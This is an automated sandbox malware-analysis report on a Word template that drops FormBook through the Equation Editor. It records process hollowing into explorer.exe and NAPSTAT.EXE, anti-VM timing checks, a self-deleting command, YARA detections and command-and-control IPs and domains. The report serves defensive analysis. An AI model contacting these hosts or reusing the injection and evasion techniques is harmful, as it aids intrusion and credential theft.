          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FC90 NtUnmapViewOfSection,7_2_0233FC90
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FD5C NtEnumerateKey,7_2_0233FD5C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02341D80 NtSuspendThread,7_2_02341D80
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_000981C0 NtCreateFile,7_2_000981C0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00098270 NtReadFile,7_2_00098270
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_000982F0 NtClose,7_2_000982F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_000983A0 NtAllocateVirtualMemory,7_2_000983A0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_000981BA NtCreateFile,7_2_000981BA
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0009826A NtReadFile,7_2_0009826A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_000982EB NtClose,7_2_000982EB
          Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: vbc[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
          Source: classification engine Classification label: mal100.troj.expl.evad.winDOT@10/8@8/5
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$dot.dot
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC5FD.tmp
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
          Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: dot.dot Virustotal: Detection: 43%
          Source: dot.dot ReversingLabs: Detection: 33%
          Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6705C562-0AE7-40EA-8474-F39DAB1813D0}\InProcServer32
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
          Source: Binary string: napstat.pdb source: vbc.exe, 00000005.00000003.2117075823.000000000050C000.00000004.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\Public\vbc.exe | Unpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.data:W;.fipuh:W;.wuta:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;
          Source: vbc[1].exe.2.dr | Static PE information: section name: .fipuh
          Source: vbc[1].exe.2.dr | Static PE information: section name: .wuta
          Source: vbc[1].exe.2.dr | Static PE information: section name: .new
          Source: vbc.exe.2.dr | Static PE information: section name: .fipuh
          Source: vbc.exe.2.dr | Static PE information: section name: .wuta
          Source: vbc.exe.2.dr | Static PE information: section name: .new
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_002370D6 pushfd ; iretd 4_2_002370D9
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0023D921 pushfd ; ret 4_2_0023D928
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0023C955 push eax; ret 4_2_0023C9A8
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0023C9A2 push eax; ret 4_2_0023C9A8
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0023C9AB push eax; ret 4_2_0023CA12
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0023CA0C push eax; ret 4_2_0023CA12
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0022D32A push 00000064h; retf 4_2_0022D32C
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0023743D push esi; iretd 4_2_00237446
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_002364CB push 0000000Dh; retf 4_2_002364CE
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00237516 pushfd ; iretd 4_2_0023752F
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_03ECE2D7 push ebx; iretd 4_2_03ECE4A7
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_03ECE4AD push ebx; iretd 4_2_03ECE4A7
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_03ECE46F push ebx; iretd 4_2_03ECE4A7
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00415B36 pushfd ; iretd 5_2_00415B39
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C381 pushfd ; ret 5_2_0041C388
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B3B5 push eax; ret 5_2_0041B408
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B46C push eax; ret 5_2_0041B472
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B402 push eax; ret 5_2_0041B408
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B40B push eax; ret 5_2_0041B472
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0040BD8A push 00000064h; retf 5_2_0040BD8C
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00415E9D push esi; iretd 5_2_00415EA6
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00415F76 pushfd ; iretd 5_2_00415F8F
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00414F2B push 0000000Dh; retf 5_2_00414F2E
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008EDFA1 push ecx; ret 5_2_008EDFB4
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_00415B36 pushfd ; iretd 5_1_00415B39
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041C381 pushfd ; ret 5_1_0041C388
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041B3B5 push eax; ret 5_1_0041B408
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041B46C push eax; ret 5_1_0041B472
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041B402 push eax; ret 5_1_0041B408
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041B40B push eax; ret 5_1_0041B472
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0040BD8A push 00000064h; retf 5_1_0040BD8C
          Source: initial sample | Static PE information: section name: .text entropy: 7.49490680745
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | RDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00229B80 rdtsc 4_2_00229B80
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2436 | Thread sleep time: -240000s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2436 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 2864 | Thread sleep time: -48000s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2856 | Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Last function: Thread delayed
          Source: explorer.exe, 00000006.00000000.2089261949.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2094952508.0000000004234000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.2094994772.0000000004263000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000006.00000000.2094952508.0000000004234000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.2089285245.0000000000231000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process queried: DebugPort
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00409B20 LdrLoadDll,5_2_00409B20
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00220042 push dword ptr fs:[00000030h] 4_2_00220042
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_03EC8E2B push dword ptr fs:[00000030h] 4_2_03EC8E2B
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008F26F8 mov eax, dword ptr fs:[00000030h] 5_2_008F26F8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 7_2_023526F8 mov eax, dword ptr fs:[00000030h] 7_2_023526F8
          Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 45.142.156.44 80
          Source: C:\Windows\explorer.exe | Domain query: www.xpddwrfj.icu
          Source: C:\Windows\explorer.exe | Domain query: www.likehowto.com
          Source: C:\Windows\explorer.exe | Domain query: www.pjsgsc.com
          Source: C:\Windows\explorer.exe | Network Connect: 203.76.236.103 80
          Source: C:\Windows\explorer.exe | Domain query: www.7985699.com
          Contains functionality to inject code into remote processes
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00220110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,ExitProcess,4_2_00220110
          Injects a PE file into a foreign processes
          Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1388
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Thread register set: target process: 1388
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: ED0000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000000.2089393754.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 00000007.00000002.2377175053.0000000000F20000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2089393754.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 00000007.00000002.2377175053.0000000000F20000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2089261949.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2089393754.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 00000007.00000002.2377175053.0000000000F20000.00000002.00000001.sdmp | Binary or memory string: !Progman
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040B530 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_0040B530

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules1 | Path Interception | Process Injection712 | Masquerading111 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Exploitation for Client Execution13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion2 | LSASS Memory | Security Software Discovery221 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer15 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection712 | Security Account Manager | Virtualization/Sandbox Evasion2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information1 | NTDS | Process Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol123 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information3 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing13 | Cached Domain Credentials | File and Directory Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
